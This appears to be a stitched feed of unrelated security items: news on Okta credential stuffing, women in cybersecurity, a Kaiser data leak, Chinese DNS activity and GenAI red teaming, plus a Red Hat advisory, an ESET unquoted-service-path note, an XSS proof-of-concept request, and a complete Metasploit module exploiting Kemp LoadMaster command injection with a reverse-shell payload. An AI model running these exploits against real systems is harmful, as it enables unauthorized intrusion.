Okta warns users that the attack requests are made through an anonymizing service like Tor or various commercial proxy networks.

Source: Ahmed Zaggoudi via Alamy Stock Photo

Credential-stuffing attacks targeting online services are spiking due to the accessibility of residential proxy services, stolen credentials, and scripting tools, Okta is warning its users.

From April 19 through April 26, Okta's researchers observed an increase in credential-stuffing attacks against Okta accounts.

Moussa Diallo and Brett Winterford, researchers at Okta Security, note that all recent attacks share a common denominator: The requests are made largely through an anonymizing device such as Tor. 

In addition to this, the researchers found that millions of requests were routed through various residential proxies such as NSOCKS, Luminati, and Datalmpulse. These residential proxies are "networks of legitimate user devices that route traffic on behalf of a paid subscriber." The researchers recently have observed a significant number of mobile devices used in proxy networks where the user has a downloaded app on their device using compromised software developer kits (SDKs).

"Effectively, the developers of these apps have consented to or have been tricked into using an SDK that enrolls the device of any user running the app in a residential proxy network," the researchers wrote. "The net sum of this activity is that most of the traffic in these credential-stuffing attacks appear to originate from the mobile devices and browsers of everyday users."

Okta has released a capability into the Workforce Identity Cloud (WIC) and Customer Identity Solution (CIS) that blocks requests from anonymizing services. This feature can be turned on in the settings of the Okta Admin Console. Organizations that want to block access from specific anonymizers must be licensed to use Dynamic Zones, an Adaptive MFA feature.

Okta also recommends that its users shore up best-practice defense measures to prevent account takeovers from credential-stuffing attacks.

"Defense in-depth measures, such as utilizing multifactor authentication on externally available employee access portals as well as sensitive internal systems, are needed here," said Thomas Richards, principal consultant at Synopsys Software Integrity Group, in an emailed statement to Dark Reading. "Additionally, there are anomalous behavior detection systems that can identify if a user is logging in at an unusual time, physical location, or source IP address."

**About the Author(s)**

Okta: Credential-Stuffing Attacks Spike via Proxy Networks

While other professions are making up ground, cybersecurity still lags behind in female representation, thanks to a lack of respect and inclusion.

Source: Valeriy Kachaev via Alamy Stock Photo

Right now, in 2024, at least three of every four cybersecurity professionals is male.

Cybersecurity is hardly the only male-dominated industry, but even in contrast to others — like law (53%), accounting (46%), and doctors of medicine (37%) — it lags behind.

According to new research from ISC2, women make up just 20% to 25% of the cybersecurity industry. And that figure, it noted, has remained relatively consistent for some years.

It stands out even more when compared with the racial makeup of the industry. While the majority of cyber pros over the age of 40 in the US, the UK, Canada, and Ireland are white, the majority under 40 are not. ISC2 found that over the past 12 months, a full two-thirds of new entrants to the industry from those countries have been non-white.

The takeaway? Cybersecurity is fixing its diversity problem, but only halfway.

**Gender Representation in Cyber, by the Numbers**

Just 4% of ISC2 survey respondents indicated that women make up a majority of their security teams. By contrast, 11% admitted they have no women on their teams at all.

There seems to be a mild networking effect at play, too. The average woman in security works with around 8% more women (30%) on average than men do (22%).

The problem is pretty much the same across industries, as the most-diverse sectors, like cloud services, automotive, and construction (all 28% female), don't far outpace the least-diverse (military and energy, each at 20%).

There are, however, some positive trends alongside the lagging ones.

Where only around 14% or 15% of cyber pros over age 40 are women, at least 25% under age 35 are (a relative improvement).

Most interestingly, the women who do make it into the cybersecurity field tend to rise up the corporate ladder at least as high as, if not higher than, their male counterparts. Women own executive titles at a similar clip to men. A greater percentage of them possess managerial-level roles, and a lesser percentage are ranked as individual contributors. And counterintuitive though it may sound, a greater percentage of women in security are involved in the hiring process than are men (33% to 24%).

That data, however, contrasts with other recent findings.

**The Root of the Problem: Exclusion**

In its "2023 State of Inclusion Benchmark in Cybersecurity" report, Women in Cybersecurity (WiCyS) tracked the ways in which women experience exclusion in the industry. "Respect" ranked as the worst issue on its list, but just behind respect was "career and growth opportunities."

"Women are experiencing a glass ceiling at around six years," reports Lynn Dohm, executive director at WiCyS. "You could imagine the journey for a woman in cybersecurity as they're advancing in their career, not necessarily getting the stretch assignments they're anticipating, perhaps their managers aren't taking initiative and identifying the trajectory of their career within the organization, they're getting passed up for promotions and experiencing that lack of respect with microaggressions, tokenism, comments. All of that leads up to the point where an individual would likely choose to step out of the career and move into other areas."

It's a self-fulfilling cycle: Too little female representation is leading more women to steer clear of security. As Dohm puts it: "Lack of diversity in the workforce is a symptom of the lack of inclusion."

Simply hiring more women doesn't solve the problem, either, since exclusion extends far deeper than any one person or organization can account for.

"The gender gap in cybersecurity begins long before women reach the workforce," explains Jessy McDermott, partner solution architect at Aqua Security. "I know firsthand as a former engineering student that this gap existed at the college level. For example, only four other women — out of an original 15, excluding myself — completed the engineering program alongside me at UMass Dartmouth. During those four years, I experienced an ongoing prejudice and doubt and saw how women were ultimately driven out of the field before they even graduated.

"This is only exacerbated as time goes on and women begin to see that careers in information technology or cybersecurity are 'male-dominated.' If you’re somehow able to get through college without being driven out of the field, you've just started the first leg of a never-ending journey. Ultimately, this can all lead to imposter syndrome, which myself and many female friends in the industry deal with. I have days where, even now, as a cybersecurity professional with years of experience under my belt, I still get challenged to show and, more importantly, prove my knowledge to others."

So, she adds, "I love how more companies are going out of their way to hire more women into the field, but to see a difference, women need internal support to feel confident and be successful in their roles."

**Non-Diversity Consequences to Companies**

Besides the obvious consequences for people, there are also consequences for uniformity for companies.

"When retention isn't there for female talent, it costs money, because it's pulling back out recruiting dollars. And it's also a reputational risk," Dohm notes.

"Broader than cybersecurity, there's a body of research that says the more perspectives you bring to the table, the better off you will be at problem solving," says Clar Rosso, CEO of ISC2. "In cybersecurity, which is a very complex, growing threat landscape, the more perspectives that we bring to the table to solve problems, the more likely we will be able to impact our cyber defense."

Dohm puts it tersely: "It's a security risk not having the diverse perspective that women bring to the cybersecurity workforce."

**About the Author(s)**

Nate Nelson is a freelance writer based in New York City. Formerly a reporter at Threatpost, he contributes to a number of cybersecurity blogs and podcasts. He writes "Malicious Life" -- an award-winning Top 20 tech podcast on Apple and Spotify -- and hosts every other episode, featuring interviews with leading voices in security. He also co-hosts "The Industrial Security Podcast," the most popular show in its field.

Cybersecurity Is Becoming More Diverse … Except by Gender

Tracking code used for keeping tabs on how members navigated through the healthcare giant's online and mobile sites was oversharing a concerning amount of information.

Source: Wirestock, Inc. via Alamy Stock Photo

Hard on the heels of a significant data theft at UnitedHealth, fellow healthcare behemoth Kaiser Permanente publicly announced a data breach affecting 13.4 million current and former insurance members.

Kaiser's systems inadvertently shared patient data with third-party advertisers, including Google, Microsoft, and social platform X, the company said, thanks to the presence of improperly implemented tracking code that Kaiser used to see how its members navigated through its Web and mobile sites.

"Certain online technologies, previously installed on its websites and mobile applications, may have transmitted personal information to third-party vendors," the company said in a media statement.

The shared data included names, IP addresses, what pages people visited, whether they were actively signed in, and even the search terms they used when visiting the company's online health encyclopedia.

Kaiser has reportedly removed the tracking code from its sites, and while the incident wasn't a hacking event, the breach is still concerning from a security perspective, according to Narayana Pappu, CEO at Zendata.

"The presence of third-party trackers belonging to advertisers, and the oversharing of customer information with these trackers, is a pervasive problem in both health tech and government space," he explains. "Once shared, advertisers have used this information to target ads at users for complementary products (based on health data); this has happened multiple times in the past few years, including at Goodrx. Although this does not fit the traditional definition of a data breach, it essentially results in the same outcome — an entity and the use case the data was not intended for has access to it. There is usually no monitoring/auditing process to identify and prevent the issue."

**About the Author(s)**

13.4M Kaiser Insurance Members Affected by Data Leak to Online Advertisers

Likely China-linked adversary has blanketed the Internet with DNS mail requests over the past five years via open resolvers, furthering Great Firewall of China ambitions. But the exact nature of its activity is unclear.

Source: Mrinal Pal via Shutterstock

During an investigation into the activities of a threat group providing domain name system (DNS) infrastructure for illicit online gambling sites, threat researcher Renée Burton discovered something completely novel: Covert traffic immune to China's government-run firewall using open DNS resolvers and mail records to communicate.

The China-linked group — dubbed Muddling Meerkat — has demonstrated its ability to get specific DNS packets through the Great Firewall, one of the technologies separating China's Internet from the rest of the world, Burton, vice president of threat research at network security firm Infoblox, wrote in an analysis published this week.

While most requests for restricted domains return a seemingly random IP address, Muddling Meerkat is able to get DNS mail (MX) records with random-looking prefixes in response to certain requests, even when the domain has no mail service.

The goal of the capability remains unclear — most likely it's for reconnaissance or establishing the foundations of a DNS denial-of-service attack, Burton says — but the demonstrated expertise and ability to pierce the GFW deserves additional research, she says.

"We have a deliberate, very cunning use using very detailed knowledge of DNS — this is not your average cybercriminal; this is not your average teenager; these people are experts in DNS," Burton says. "So we have something that has been going on for four and a half years at this point, which isn't observable in any one location, but is deliberate and constant — and that combination of things, to me, is worrisome."

The threat research comes as the governments of the United States and other nations have warned that China's military has infiltrated critical infrastructure networks with a goal of pre-positioning their cyber operators for potential future conflicts. While many threat researchers have noted China-linked hacking groups' expertise in finding and exploiting zero-days in edge devices such as firewalls and virtual private network (VPN) appliances, the current research underscores their capabilities in utilizing the domain name system (DNS) for their own purposes.

**Great Chinese Firewall: "Operator on the Side"**

The Chinese Communist Party prevents its citizens from going to content that the government considers inappropriate or illegal — not by blocking the traffic, but by returning fake responses to DNS queries that prevent a user in China from connecting to the desired site. The approach, dubbed the Great Firewall (GFW), is not an inline traffic filter nor a platform that alters DNS responses on the fly, but rather an "operator on the side" that issues a response that competes with any packet from the original intended destination, says Burton.

While the Great Firewall does not intercept traffic, China does operate another system — often referred to as the Great Cannon (GC) — that takes the adversary-in-the-middle (AitM) approach, modifying packets en route to their destination, she wrote in the report.

"In combination, the GFW and GC create a lot of noise and misleading data that can hinder investigations into anomalous behavior in DNS," the report said. "Muddling Meerkat operations are complex and demonstrate that the actor has a strong understanding of DNS, as well as internet savvy."

Mail (MX) records from kb.com, even though the domain has no mail service. Source: Infoblox

Typically, researchers can see the Great Firewall in operation. When they send a DNS request to a domain considered to be out of bounds by the Chinese government, the GFW will return a seemingly random IP address. When they ask for a non-existent service for that domain, such as a mail (MX) record, the GFW still sends an IP address. However, Infoblox researchers and their industry partners instead saw mail records for domains that had no mail services, and each MX records had a seemingly random, albeit short, host name.

Kb.com, for example, has no MX records, but the researchers have seen a large number of mail responses, seemingly from the domain for servers with names such as "pq5bo\[.\]kb\[.\]com" and "uff0h\[.\]kb\[.\]com".

**Covert Widespread DNS Traffic**

The unexplained Internet traffic — which was initially detected as far back as Oct. 15, 2019 — could be some sort of reconnaissance that uses open resolvers and "super-aged" domains that foil many DNS block lists, says Burton.

"It's super under the radar, right? So that's kind of a recon-y looking thing," she says. "The other thing about it, though, is it has that DNS denial-of-service aspect. There are concerns that the Chinese are positioning themselves for operations against critical infrastructure, and here they've positioned themselves in DNS in a really weird way."

Combined with the recent announcement by the US Cybersecurity and Infrastructure Security Agency (CISA) that China is pre-positioning itself inside other organizations' infrastructures, Infoblox decide to go public with what the company and its anonymous partners had discovered.

Infoblox collaborated with other organizations, which the company declined to name due to worries of retribution and the potential loss of access to the DNS activity data. While the Muddling Meerkat operation appears similar to some "slow drip" DNS denial-of-service attacks, determining the purpose of the traffic will likely require more research participants, Burton says.

"I don't believe there's anyone who can see this operation in totality," she says. "Every single piece is seen individually, and then what we did was we brought a bunch of different pieces together, so we could see the whole thing. This is a complete mystery ... but it definitely is there."

**About the Author(s)**

Veteran technology journalist of more than 20 years. Former research engineer. Written for more than two dozen publications, including CNET News.com, Dark Reading, MIT's Technology Review, Popular Science, and Wired News. Five awards for journalism, including Best Deadline Journalism (Online) in 2003 for coverage of the Blaster worm. Crunches numbers on various trends using Python and R. Recent reports include analyses of the shortage in cybersecurity workers and annual vulnerability trends.

'Muddling Meerkat' Poses Nation-State DNS Mystery

This Metasploit module exploits an unauthenticated command injection vulnerability in Progress Kemp LoadMaster in the authorization header after version 7.2.48.1. The following versions are patched: 7.2.59.2 (GA), 7.2.54.8 (LTSF), and 7.2.48.10 (LTS).

    ### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##class MetasploitModule < Msf::Exploit::Remote  Rank = ExcellentRanking  include Msf::Exploit::Remote::HttpClient  prepend Msf::Exploit::Remote::AutoCheck  def flag_file    return @flag_file unless @flag_file.nil?    @flag_file = '/tmp/' + Rex::Text.rand_text_alpha(5)  end  def initialize(info = {})    super(      update_info(        info,        'Name' => 'Kemp LoadMaster Unauthenticated Command Injection',        'Description' => %q{          This module exploits an unauthenticated command injection vulnerability in          Progress Kemp LoadMaster in the authorization header after vversion 7.2.48.1.          The following versions are patched: 7.2.59.2 (GA), 7.2.54.8 (LTSF) and          7.2.48.10 (LTS).        },        'Author' => [          'Dave Yesland with Rhino Security Labs',        ],        'License' => MSF_LICENSE,        'References' => [          ['CVE', '2024-1212'],          ['URL', 'https://rhinosecuritylabs.com/research/cve-2024-1212unauthenticated-command-injection-in-progress-kemp-loadmaster/'],          ['URL', 'https://kemptechnologies.com/kemp-load-balancers']        ],        'DisclosureDate' => '2024-03-19',        'Notes' => {          'Stability' => [ CRASH_SAFE ],          'SideEffects' => [ IOC_IN_LOGS, ARTIFACTS_ON_DISK],          'Reliability' => [ REPEATABLE_SESSION ]        },        'Platform' => ['unix', 'linux'],        'Arch' => [ARCH_CMD],        'Privileged' => false,        'Targets' => [          [            'Automatic', # Add logic to run the payload only once            {              'Payload' => {                'Prepend' => "[ -f #{flag_file} ] || ( touch #{flag_file}; (sleep 60; rm #{flag_file})& ",                'Append' => ')',                'BadChars' => "\x3a\x27"              }            }          ],          [            'Do_Not_Prepend_Runonce_Code', # This will likely result in 2-3 sessions            {              'Payload' => {                'BadChars' => "\x3a\x27"              }            }          ]        ],        'Default_target' => 0,        'DefaultOptions' => {          'PAYLOAD' => 'cmd/linux/http/x64/meterpreter_reverse_tcp',          'FETCH_WRITABLE_DIR' => '/tmp/',          'SSL' => true,          'RPORT' => 443        }      )    )    register_options([      OptString.new('TARGETURI', [true, 'The URI path to LoadMaster', '/'])    ])  end  def exploit    uri = normalize_uri(target_uri.path, 'access', 'set')    vprint_status('Sending payload...')    send_request_cgi({      'method' => 'GET',      'uri' => uri,      'vars_get' =>        {          'param' => 'enableapi',          'value' => '1'        },      'authorization' => basic_auth("';#{payload.encoded};echo '", Rex::Text.rand_text_alpha(rand(8..15))),      'verify' => false    })  end  def on_new_session(client)    super    print_good('Now background this session with "bg" and then run "resource run_progress_kemp_loadmaster_sudo_priv_esc_2024.rc" to get a root shell')  end  def check    print_status("Checking if #{peer} is vulnerable...")    uri = normalize_uri(target_uri.path, 'access', 'set')    res = send_request_cgi({      'method' => 'GET',      'uri' => uri,      'vars_get' => {        'param' => 'enableapi',        'value' => '1'      },      'authorization' => basic_auth("'", Rex::Text.rand_text_alpha(rand(8..15))),      'verify' => false    })    # No response from server    unless res      return CheckCode::Unknown    end    # Check for specific error pattern in headers or body to confirm vulnerability    if res.headers.to_s.include?('unexpected EOF while looking for matching') || res.body.include?('unexpected EOF while looking for matching')      return CheckCode::Vulnerable    else      return CheckCode::Safe    end  endend

Kemp LoadMaster Unauthenticated Command Injection

Doctor Appointment Management System version 1.0 suffers from a cross site scripting vulnerability.

# Application Name: Doctor Appointment Management System  
# Software Link: [Download Link](https://phpgurukul.com/doctor-appointment-management-system-using-php-and-mysql/)  
# Vendor Homepage: [Vendor Homepage](https://phpgurukul.com/)  
# BuG: XsS  
# BUG_Author: SoSPiro  
# Version: 1.0  
# CVE: CVE-2024-4293

### Vulnerable code section:

- `http://localhost/Doctor-Appointment-System_PHP/dams/doctor/appointment-bwdates.php`  
- **`Lines 57-61`**

- Parameter `$fdate=$_POST['fromdate'];` and `$tdate=$_POST['todate']`

 ```php  
<?php  
$fdate=$_POST['fromdate'];  
$tdate=$_POST['todate'];  
?>  
<h5 align="center" style="color:blue">Report from <?php echo $fdate?> to <?php echo $tdate?></h5>

```  
- The lack of proper validation and sanitization of user input allows for potential Cross-Site Scripting (XSS) attacks.

### Vulnerability Description:

- The Doctor Appointment Management System is susceptible to a Cross-Site Scripting (XSS) vulnerability. This vulnerability allows attackers to inject malicious scripts into web pages viewed by other users.

### Proof of Concept (PoC)

- Poc Video : [Video Link](https://drive.google.com/file/d/1X7OPM1_Sb-xeIZO8ZdXekLtinUqzVdLx/view?usp=sharing)

- Poc Video2: [Video Link](https://drive.google.com/file/d/1V6TP9ecAGUbsLvupE_7aQ8lkn_h5Jm18/view?usp=sharing)

```http

POST /Doctor-Appointment-System_PHP/dams/doctor/appointment-bwdates-reports-details.php HTTP/1.1  
Host: localhost  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8  
Accept-Language: en-US,en;q=0.5  
Accept-Encoding: gzip, deflate, br  
Content-Type: application/x-www-form-urlencoded  
Content-Length: 60  
Origin: http://localhost  
Connection: close  
Referer: http://localhost/Doctor-Appointment-System_PHP/dams/doctor/appointment-bwdates.php  
Cookie: PHPSESSID=n8jjbs917jtj52rags5p7ll9ff  
Upgrade-Insecure-Requests: 1  
Sec-Fetch-Dest: document  
Sec-Fetch-Mode: navigate  
Sec-Fetch-Site: same-origin  
Sec-Fetch-User: ?1  
X-PwnFox-Color: blue

fromdate=<script>alert(1)</script>&todate=2024-04-18&submit=

```

- In this POST request, an attacker has included a script tag in the "fromdate" and "todate" field:

`<script>alert(1)</script>`

- Upon successful exploitation, an alert box containing the text "1" will be displayed on the victim's browser, indicating that the XSS vulnerability has been successfully exploited.

### Impact:

- The impact of this vulnerability is significant. Attackers can exploit it to execute arbitrary JavaScript code within the context of the affected web page. This could lead to various malicious activities such as session hijacking, phishing attacks, or defacement of the website.

### Reproduce:

- [ -vuldb.com- ](https://vuldb.com/?id.262225)

- [  -cve.org- ](https://www.cve.org/CVERecord?id=CVE-2024-4293)

- [ -github- ](https://github.com/Sospiro014/zday1/blob/main/doctor_appointment_management_system_xss.md)

- [ -github2- ](https://github.com/Sospiro014/zday1/blob/main/doctor_appointment_management_system_xss2.md)

Doctor Appointment Management System 1.0 Cross Site Scripting

ESET NOD32 Antivirus version 17.1.11.0 suffers from an unquoted service path vulnerability.

    # Exploit Title: ESET NOD32 Antivirus 17.1.11.0 - Unquoted Service Path# Exploit Author: Milad Karimi (Ex3ptionaL)# Exploit Date: 2024-04-27# Contact: miladgrayhat@gmail.com# Zone-H: www.zone-h.org/archive/notifier=Ex3ptionaL# Vendor : https://www.eset.com# Version : 17.1.11.0# Tested on OS: Microsoft Windows 10 pro x64About Unquoted Service Path :==============================When a service is created whose executable path contains spaces and isn'tenclosed within quotes, leads to a vulnerability known as Unquoted ServicePath which allows a user to gain SYSTEM privileges.(only if the vulnerable service is running with SYSTEM privilege levelwhich most of the time it is).C:\>wmic service get name,displayname,pathname,startmode |findstr /i "auto"|findstr /i /v "c:\windows\\" |findstr /i /v """ESET Updater ESETServiceSvc C:\Program Files (x86)\ESET\ESETSecurity\ekrn.exeC:\>sc qc ekrn[SC] QueryServiceConfig SUCCESSSERVICE_NAME: ekrn        TYPE               : 20  WIN32_SHARE_PROCESS        START_TYPE         : 2   AUTO_START        ERROR_CONTROL      : 1   NORMAL        BINARY_PATH_NAME   : "C:\Program Files\ESET\ESET Security\ekrn.exe"        LOAD_ORDER_GROUP   : Base        TAG                : 0        DISPLAY_NAME       : ESET Service        DEPENDENCIES       :        SERVICE_START_NAME : LocalSystem

ESET NOD32 Antivirus 17.1.11.0 Unquoted Service Path

Red Hat Security Advisory 2024-2086-03 - An update for shim is now available for Red Hat Enterprise Linux 8.6 Extended Update Support. Issues addressed include buffer overflow, bypass, integer overflow, and out of bounds read vulnerabilities.

The following advisory data is extracted from:

https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_2086.json

Red Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.

- Packet Storm Staff

====================================================================  
Red Hat Security Advisory

Synopsis:           Important: shim security update  
Advisory ID:        RHSA-2024:2086-03  
Product:            Red Hat Enterprise Linux  
Advisory URL:       https://access.redhat.com/errata/RHSA-2024:2086  
Issue date:         2024-04-29  
Revision:           03  
CVE Names:          CVE-2023-40546  
====================================================================

Summary: 

An update for shim is now available for Red Hat Enterprise Linux 8.6 Extended  
Update Support.

Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.

Description:

The shim package contains a first-stage UEFI boot loader that handles chaining  
to a trusted full boot loader under secure boot environments.

Security Fix(es):

* shim: RCE in http boot support may lead to Secure Boot bypass (CVE-2023-40547)

* shim: Interger overflow leads to heap buffer overflow in verify_sbat_section  
on 32-bits systems (CVE-2023-40548)

* shim: Out-of-bounds read printing error messages (CVE-2023-40546)

* shim: Out-of-bounds read in verify_buffer_authenticode() malformed PE file  
(CVE-2023-40549)

* shim: Out-of-bound read in verify_buffer_sbat() (CVE-2023-40550)

* shim: out of bounds read when parsing MZ binaries (CVE-2023-40551)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.

Solution:

https://access.redhat.com/articles/11258

CVEs:

CVE-2023-40546

References:

https://access.redhat.com/security/updates/classification/#important  
https://bugzilla.redhat.com/show_bug.cgi?id=2234589  
https://bugzilla.redhat.com/show_bug.cgi?id=2241782  
https://bugzilla.redhat.com/show_bug.cgi?id=2241796  
https://bugzilla.redhat.com/show_bug.cgi?id=2241797  
https://bugzilla.redhat.com/show_bug.cgi?id=2259915  
https://bugzilla.redhat.com/show_bug.cgi?id=2259918

Red Hat Security Advisory 2024-2086-03

By embracing a proactive approach to cyber-risk management, companies can better detect, prevent, and mitigate cyber threats while integrating the latest state-of-the-art technology.

Source: NicoElNino via Alamy Stock Photo

COMMENTARY

In today's fast-paced world, most businesses are racing to incorporate the latest technology and innovations to meet the demands of customers craving convenience and accessibility. After all, who doesn't love banking from their phone 24/7 or shopping from their couch?

To meet these demands, companies rush to implement new technology as quickly as it emerges, but while enhancing business operations is undeniably lucrative, it comes with a price: Risk. As we embrace all the luxuries of innovation, cybercriminals are poised to exploit the vulnerabilities that these changes expose. Industries like healthcare and financial services are especially attractive targets, due to the valuable data and assets they are entrusted to protect, but cybercrime poses a threat to all. As a result, taking a proactive approach to managing cyber-risk, which involves pre-emptive and continuous action to assess and address risks caused by innovation, is being emphasized as a strategic necessity.

Traditional cybersecurity practices are like playing a never-ending game of whack-a-mole, because just as soon as one risk or vulnerability is addressed, another one pops up, presenting a new challenge. This can be frustrating, time-consuming, and ineffective in the rapidly evolving threat landscape. This ever-changing complexity further highlights the dynamic landscape of cybersecurity. We know that risk is an inherent part of all change — whether opening a new physical location, merging with another company, or implementing an online bill pay system, any modifications open the door to new vulnerabilities. Sounds bleak, right? Yes, the warnings about risk are ominous, but there is a way for businesses to participate in innovation successfully and prepare for the inevitable risk … and it's all about embracing a new mindset.

In the latest annual Global CEO Survey by PwC, CEOs in the financial sector and capital markets reported a significant concern over the threat to profitability due to changing consumer demands and behaviors. As a way to tackle this possible problem, CEOs invest significantly in technology such as AI and cloud solutions by automating processes and systems to improve the customer experience — a proactive measure to mitigate a possible threat to their bottom line.

However, a lack of attention to cybersecurity during the implementation of these technology solutions poses a significant risk to organizations where trust is critical. Cybersecurity is often an afterthought as companies integrate new processes and, especially, new technologies. This mindset leaves your business and your customers vulnerable to threat actors, so it’s time to substantially shift how change, risk, and strategy are perceived.

**An Action Plan**

Integrating cybersecurity defenses in tandem with new technology — not as a reactive action because a threat suddenly popped up — is the most effective route. Put the mallet down and approach cyber-risk with real-time data so your company stays ahead of emerging threats, instead of standing poised and hoping your reaction is well-timed. The development of technologies should be designed and planned with possible exposure to risk at the forefront. This proactive method simultaneously addresses both challenges, improves their performance through technology, and bolsters security measures. To implement this approach, a cyber framework that integrates with new projects at every stage can be implemented, even if it means extending the development timeline. In that way, businesses can address both challenges in a complementary manner, enhancing performance through technology while becoming more cyber secure.

This approach not only protects against cyber threats but also improves customer experience, since customers often demand seamless, convenient, and secure services. By integrating cybersecurity in tandem with technology implementation, companies across all industries can improve their customer experience while retaining trust. 

It’s important for businesses to work with a trusted partner in cyber-risk management to evaluate new technology for risk as it is created, rather than reacting to the risk that the technology triggered. This approach allows your company to identify potential vulnerabilities in new technology early on and implement appropriate security measures to mitigate the risks rather than addressing them after your business and your customers are already at risk. This assessment can identify potential vulnerabilities in the technology and determine the level of risk associated with each vulnerability. Based on this assessment, a plan is developed to mitigate the risks and ensure the security of systems and data. The information can be leveraged to create and implement policies and procedures for managing and monitoring the new technology to ensure ongoing security.

These recommendations serve as a reminder that being proactive doesn't just involve addressing risk due to a new product or service offering. It also means being proactive in defining, adopting, and measuring the effectiveness of risk assessments, as well as implementing the best practices that can mitigate these risks before they occur.

By embracing a proactive approach to cyber-risk management as a whole, companies across all industries can better detect, prevent, and mitigate cyber threats while integrating the latest state-of-the-art technology. And the best part? You can put that mallet away, because your company will detect threats before they even have a chance to pop up.

**About the Author(s)**

CEO, DefenseStorm

Steve Soukup has served as Chief Executive Officer at DefenseStorm since 2020 and in that role is responsible for leading all aspects of the company’s business. He is passionate about building a community of trust among our teams and with our customers while also enabling our customers to do the same with their account holders. Steve joined DefenseStorm as Chief Revenue Officer in May 2017 with a charge to drive growth for the business while leveraging his extensive experience serving the banking vertical. He was promoted to President in October 2019 and then to CEO in April of 2020. Under his leadership, DefenseStorm has set the standard for enabling banks and credit unions to achieve cyber risk readiness. Steve is a graduate of Boston College and earned a Master of Business Administration degree from Boston University. A native of Cleveland, Ohio, Steve and his family have called the Atlanta area home for over 10 years.

Addressing Risk Caused by Innovation

Red teaming is a crucial part of proactive GenAI security that helps map and measure AI risks.

Source: josefotograf via Alamy

Generative artificial intelligence (GenAI) has emerged as a significant change-maker, enabling teams to innovate faster, automate existing workflows, and rethink the way we go to work. Today, more than 55% of companies are currently piloting or actively using GenAI solutions.

But for all its promise, GenAI also represents a significant risk factor. In an ISMG poll of business and cybersecurity professionals, respondents identified a number of concerns around GenAI implementation, including data security or leakage of sensitive data, privacy, hallucinations, misuse and fraud, and model or output bias.

For organizations looking to create additional safeguards around GenAI use, red teaming is one strategy they can deploy to proactively uncover risks in their GenAI systems. Here's how it works.

**Unique Considerations When Red Teaming GenAI**

GenAI red teaming is a complex, multistep process that differs significantly from red teaming classical AI systems or traditional software.

For starters, while traditional software or classical AI red teaming is primarily focused on identifying security failures, GenAI red teaming must account for responsible AI risks. These risks can vary widely, ranging from generating content with fairness issues to producing ungrounded or inaccurate information. GenAI red teaming has to explore potential security risks and responsible AI failures simultaneously.

Additionally, GenAI red teaming is more probabilistic than traditional red teaming. Executing the same attack path multiple times on traditional software systems is likely to yield similar results.

However, due to its multiple layers of nondeterminism, GenAI can provide different outputs for the same input. This can happen due to app-specific logic or the GenAI model itself. Sometimes the orchestrator that controls the output of the system can even engage different extensibility or plug-ins. Unlike traditional software systems with well-defined APIs and parameters, red teams must account for the probabilistic nature of GenAI systems when evaluating the technology.

Finally, system architectures vary widely between different types of GenAI tools. There are standalone applications, integrations with existing applications, and input and output modalities, like text, audio, images, and videos, for teams to consider.

These different system architectures make it incredibly difficult to conduct manual red-team probing. For example, to surface violent content generation risks on a browser-hosted chat interface, red teams would need to try different strategies multiple times to gather sufficient evidence of potential failures. Doing this manually for all types of harm, across all modalities and strategies, can be exceedingly tedious and slow.

**Best Practices for GenAI Red Teaming**

While manual red teaming can be a time-consuming, labor-intensive process, it's also one of the most effective ways to identify potential blind spots. Red teams can also scale certain aspects of probing through automation, particularly when it comes to automating routine tasks and helping identify potentially risky areas that require more attention.

At Microsoft, we use an open automation framework — known as the Python Risk Identification Tool for generative AI (PyRIT) — to red team GenAI systems. It is not intended to replace manual GenAI red teaming, but it can augment red teamers' existing domain expertise, automate tedious tasks, and create new efficiency gains by identifying hot spots for potential risks. This allows security professionals to control their GenAI red-teaming strategy and execution while PyRIT provides the automation code to generate potentially harmful prompts based on the initial dataset of harmful prompts provided by the security professional. PyRIT can also change tactics based on the GenAI system's response and generate its next input. 

Regardless of the method you use, sharing GenAI red-teaming resources like PyRIT across the industry raises all boats. Red teaming is a crucial part of proactive GenAI security, enabling red teamers to map AI risks, measure identified risks, and build out scoped mitigations to minimize their impact. In turn, this empowers organizations with the confidence and security they need to innovate responsibly with the latest AI advances.

— Read more Partner Perspectives from Microsoft Security

**About the Author(s)**

Microsoft

Protect it all with Microsoft Security.

Microsoft offers simplified, comprehensive protection and expertise that eliminates security gaps so you can innovate and grow in a changing world. Our integrated security, compliance, and identity solutions work across platforms and cloud environments, providing protection without compromising productivity.

We help customers simplify the complex by prioritizing risks with unified management tools and strategic guidance created to maximize the human expertise inside your company. Our unparalleled AI is informed by trillions of signals so you can detect threats quickly, respond effectively, and fortify your security posture to stay ahead of ever-evolving threats.

Tag

#auth